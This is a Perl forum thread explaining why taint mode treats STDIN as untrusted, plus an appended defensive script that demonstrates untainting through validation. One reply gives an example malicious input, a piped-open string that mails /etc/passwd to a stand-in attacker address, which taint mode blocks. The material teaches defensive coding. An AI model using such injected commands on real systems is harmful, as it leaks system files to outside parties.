in reply to Re^3: Insecure dependency in open
in thread Insecure dependency in open

Ok, then can you please clarify why STDIN is tainted? I'm scratchin' my head long and hard on this one. What's perl protecting me from now?

Re^5: Insecure dependency in open
by ikegami (Patriarch) on Jan 22, 2007 at 18:49 UTC

    Taint should be used when the caller of the script is different than the person who owns the script. setuid scripts, CGI scripts, etc. should use it. The environment, files, STDIN, command line arguments, etc are controlled by the caller and cannot be trusted. To allow the user to specify a file name (for example) could allow him to read and/or modify files to which he normally would not have access.

      Yes, I know the doc. I'm just asking why STDIN is part of that group, especially for -t STDIN.

        I already explained and I even gave you an example. I don't know what more you want. Give me an idea?

        In the most basic of terms, -T means don't trust the user. The user controls STDIN, so it must not be trusted.

Re^5: Insecure dependency in open
by Fletch (Bishop) on Jan 22, 2007 at 19:54 UTC

    It's dangerous because it comes from a dirty, untrustworthy, malicious creature (i.e. the user). They can feed in anything they want on STDIN:

    $ perl -T -le 'chomp(my $foo = <STDIN>); unlink( $foo ) or die "unlink: $!\n";'
    /etc/passwd
    Insecure dependency in unlink while running with -T switch at -e line 1, <STDIN> line 1.
    $ perl -T -le '$ENV{PATH}="/bin:/usr/bin"; chomp(my $foo = <STDIN>); open( FOO, $foo ) or die "open: $!\n";'
    mail blackhat@evilhaxor.org -s `uname -n` < /etc/passwd ; cat /dev/null |
    Insecure dependency in piped open while running with -T switch at -e line 1, <STDIN> line 1.

    If you want to allow this, you have to explicitly validate (by means of some form of untainting) the input; and on your head be it if you do it wrong.

    Update: And as to your question about -t STDIN, that shouldn't be a problem because it's testing a property of the handle not using any input from the handle.

    $ perl -T -le 'print "tty" if -t STDIN'
    tty

      Whoops! Completely disregard this post. I thought at the time that perl wasn't even letting me read from STDIN but it is. That changes my recent follow-up question thread, which can now be discarded. (I thought perl wasn't letting me set a variable from STDIN.) Mea culpa. More later...

        I don't yet see how calling $filename = <STDIN> is any different than saying $filename = $ENV{HOME}.

        They're not.

        >echo "input" | perl -T -e "use Scalar::Util qw( tainted ); my $var = <STDIN>; print(tainted($var)?1:0, qq{\n})"
        1
        >set VAR=input & perl -T -e "use Scalar::Util qw( tainted ); my $var = $ENV{VAR}; print(tainted($var)?1:0, qq{\n})"
        1
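As an added example (not code posted by anyone in this thread), the following script ties together the points above: STDIN data is tainted exactly like %ENV, `-t STDIN` is not affected because it tests the handle rather than reading from it, and the only way to untaint is a regex capture whose pattern is the actual validation. The file name `taint_demo.pl` and the sample input are assumptions; run it as `echo report.txt | perl -T taint_demo.pl`.

```perl
# taint_demo.pl (hypothetical name) -- run with: echo report.txt | perl -T taint_demo.pl
use strict;
use warnings;
use Scalar::Util qw(tainted);

# Under -T, %ENV is tainted too. Only needed if you spawn subprocesses,
# but it is the idiomatic first line of any taint-mode script.
$ENV{PATH} = '/bin:/usr/bin';
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};

# Anything read from the caller's STDIN is tainted, same as $ENV{HOME}.
chomp(my $name = <STDIN> // '');
printf "read '%s' tainted=%d\n", $name, tainted($name) ? 1 : 0;

# Testing a property of the handle uses no data from it, so nothing is tainted.
print "STDIN is a terminal\n" if -t STDIN;

# This is what perl blocks: writing (or piping) through a tainted name.
eval { open(my $out, '>>', $name) or die "open: $!\n"; close $out; 1 }
    or print "blocked: $@";

# Untainting: a regex capture launders the value, so the pattern *is* the
# validation. Allow a plain basename only: no leading dot, no slashes,
# so "../../etc/passwd" and "mail ... |" can never get through.
sub untaint_filename {
    my ($raw) = @_;
    return $raw =~ /\A([A-Za-z0-9_][A-Za-z0-9_.-]{0,63})\z/ ? $1 : undef;
}

# The classic mistake: /(.*)/ untaints without validating anything at all.
sub untaint_badly { my ($raw) = @_; $raw =~ /(.*)/; return $1 }

my $safe = untaint_filename($name);
die "rejected '$name': not a plain file name\n" unless defined $safe;
printf "after validation tainted=%d\n", tainted($safe) ? 1 : 0;

my $sloppy = untaint_badly($name);
printf "after /(.*)/ tainted=%d, and perl no longer protects you\n",
    tainted($sloppy) ? 1 : 0;

# With a validated name the operation is allowed again.
if (open(my $fh, '<', $safe)) {
    print "opened $safe for reading\n";
    close $fh;
} else {
    print "validated, but could not open $safe: $!\n";
}
```

The `eval` prints the same "Insecure dependency in open while running with -T switch" message seen in the thread, while the final open succeeds only because the name passed the strict pattern.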